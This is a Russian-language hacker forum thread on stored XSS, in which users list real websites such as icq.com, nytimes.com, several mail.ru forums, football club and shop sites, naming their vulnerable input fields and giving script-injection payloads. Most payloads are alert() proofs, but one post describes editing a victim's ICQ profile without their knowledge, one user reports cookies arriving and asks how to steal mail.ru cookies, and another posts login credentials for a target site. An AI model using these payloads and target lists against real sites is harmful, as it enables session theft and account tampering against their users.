Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    415
    Likes Received:
    347
    Reputations:
    36
    гы активка: http://www.hossi.is/index.php?option=com_n-gestabok&Itemid=43&do=listi
    Пишем сообщение уязвимое поле: Heimasíða
     
  2. imajo.ati

    imajo.ati Banned

    Joined:
    21 Feb 2008
    Messages:
    238
    Likes Received:
    62
    Reputations:
    8
    icq.com

    план такой: создаётся номер icq, в детали пишется всюду где можно "><script>alert('x')</script>

    затем нужно залогиниться под этим номером на сайте icq.com и зайти по ссылке
    http://icq.com/people/full_details_update.php

    вылетит куча алертов =)
    нужно "помочь" юзеру логиниться за ваш номер.

    либо можно так: кинуть ссылку юзеру на отправку формы по ссылке http://icq.com/people/full_details_update.php с вашим кодом и потом опять его отправить на эту же страницу, так же вылетит алерт. тоесть отредактировать профиль юзера без его ведома.. но юзер должен быть залогинен, так что первый вариант лучше
     
    3 people like this.
  3. MadFun.

    MadFun. Elder - Старейшина

    Joined:
    8 May 2007
    Messages:
    90
    Likes Received:
    28
    Reputations:
    20
    Извеняюсь за повторение
    www.omen.ru
    <script>alert(\'Хss\')</script>
    уязвимые поля
    Ищу рост от:
    Ищу рост до:
    Ищу вес от:
    Ищу вес до:
     
    1 person likes this.
  4. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    215
    Likes Received:
    141
    Reputations:
    12
    www.26thavenue.com

    Регимся на форуме:
    Code:
    http://www.26thavenue.com/index.php?action=main.forums
    В профайле в поля Location, Interests пишем:
    Code:
    <script>alert("Antichat")</script>
     
    3 people like this.
  5. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    63
    Likes Received:
    33
    Reputations:
    6
    Поковырял еще немного.

    Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject.
    Так же просто вставляем
    Code:
    <script>alert(/Xss/)</script>
    Потом еще при отправке сообщений - поля
    Link URL,
    Link Title.
    Code:
    "><script>alert()</script>
    Забил в гугл
    попробовал в нескольких местах, везде работает.

    Кроме этого есть пассивные XSS в этом движке, пример -
    Code:
    http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3E
    
    или в другом месте -
    Code:
    http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E
     
    #145 Horsekiller, 13 Mar 2008
    Last edited: 13 Mar 2008
  6. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    56
    Likes Received:
    31
    Reputations:
    0
    www.nytimes.com
    Ну собственно онлайн версия газеты нью йорк таймс :)
    Нужно имять статут зарегенного пользователя
    когда герегились постим коммент б блоге типа
    Code:
    <irame src=http://you.site.com/xss.html  < 
    ну и собстевенно создаем у себя страничку с названием xss.html
    содержашую
    Code:
    <script>alert(/XSS/)<script>
     
    2 people like this.
  7. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    bronepoezd.ru

    в гостевой в поле сообщение пишем

    [.img]http://img.yandex.net/i/yandex-v9.gif Onload=alert()[./img]

    без точек в бб теге
     
  8. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    file.mail.ru
    narod.yandex.ru/disk/


    заливаем файл со скриптом, который, при открытии файла, выполнится.
     
    5 people like this.
  9. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    domex.ru

    Уязвимые поля:
    Площадь (м2)
    Цена


    В уязвимых полях пишем: "><script>alert()</script>
     
    1 person likes this.
  10. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    56
    Likes Received:
    31
    Reputations:
    0
    ehbsr.com
    не люблю я все таки американцев :)
    Нужно иметь статус зерегнного пользователя вот:
    User:birch64
    password:ywrcws
    тыкаем мой аккаунт и в поле fist name втыкаем:
    Code:
    <img"""><script>alert(/ЛЯ ПА ПАМ/)</script>
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204
    Футбольный клуб "Москва"
    http://www.fcmoscow.ru/ru/registration
    Уязвимые поля:
    Фамилия
    Имя
    Отчество
    NickName
    Место Жительства

    В уязвимых полях пишем: "><script>alert()</script>
    ------------------------------------------------------------------------
    Футбольный клуб "Луч-Энергия"
    www.luch-energy.ru/?search
    Уязвимое поле:
    Ваш запрос

    В уязвимом поле пишем: "><script>alert()</script>
    ------------------------------------------------------------------------
    Футбольный клуб "Локомотив"
    http://www.fclm.ru/s-info-center/
    Пишем: "><script>alert()</script>
    ------------------------------------------------------------------------
    Футбольный клуб "Амкар"
    http://www.amkar.ru/reg/reg.asp
    Уязвимые поля:
    Логин
    Город
    Веб-Сайт

    В уязвимых полях пишем: "><script>alert()</script>
    Регестрируемся
    Заходим
    Вылетает Алерт
     
    #151 Tigger, 26 Mar 2008
    Last edited: 26 Mar 2008
    2 people like this.
  12. .Striker

    .Striker Elder - Старейшина

    Joined:
    11 Nov 2007
    Messages:
    179
    Likes Received:
    63
    Reputations:
    -4
    хостинг картинок
    http://images.i-files.org/

    в поле описание пишем
    "><script>alert()</script>
    загружаем картинку, потом берем Ссылка на изображение:
    заходим по ссылке и вылетает алерт

    -------------------------------

    "Знаменитый" украинский хотинг файлов upload.com.ua

    Заходим в аккаунт и создаем каталог с названием "><script>alert()</script>
    Получаем активную xss ;)

    PS upload уже профиксили :(
     
    #152 .Striker, 30 Mar 2008
    Last edited: 31 Mar 2008
    1 person likes this.
  13. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    243
    Likes Received:
    34
    Reputations:
    8
    http://ul-rocksite.info
    Переходит на страницу чата:
    http://ul-rocksite.info/index.php?page=chat
    И в чате рисуем следующее:
    <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
    OPera Версия 9.23
     
    #153 Buffalon, 30 Mar 2008
    Last edited: 31 Mar 2008
  14. AJAY

    AJAY New Member

    Joined:
    25 Mar 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    вот мне понравился способ товарищя .Striker все работает и куки приходят, но у меня вопрос есть, допустим мне нужны куки от mail.ru, как мне их спи...ть а? тока сильно не пинайте я шланг в этом деле)
     
  15. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    mail.ru

    http://forum.hi-tech.mail.ru/
    уязвимо поле "Заголовок:"
    всеравно скоро прикроют, так что выкладываю - играйтесь)
     
    4 people like this.
  16. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    кстате и на forum.lady.mail.ru тоже работает)
     
    2 people like this.
  17. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    431
    Likes Received:
    126
    Reputations:
    4
    :D Ты забыл про forum.auto.mail.ru
    а вапще если немного посмотреть на домена мейла..то можно найти ещё парочку форумов :D
     
    #157 DimOnOID, 9 Apr 2008
    Last edited: 9 Apr 2008
    1 person likes this.
  18. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    416
    Likes Received:
    243
    Reputations:
    145
    DimOnOID, еще только на forum.horo.mail.ru, форумы игр и софта построенны на других движках и таких уязвимостей не имеют.
     
  19. -=megahertz=-

    -=megahertz=- Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    Интернет-магазин бытовой техники и электроники
    http://www.003.ru/

    При регистрации уязвимы поля Фамилия, Имя и Отчество
    "<script><alert('xss by megahertz')</script>
     
  20. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    465
    Likes Received:
    190
    Reputations:
    50
    2 people like this.
Loading...
Similar Threads - Хранимые
  1. 4upakabr0
    Replies:
    3
    Views:
    1,776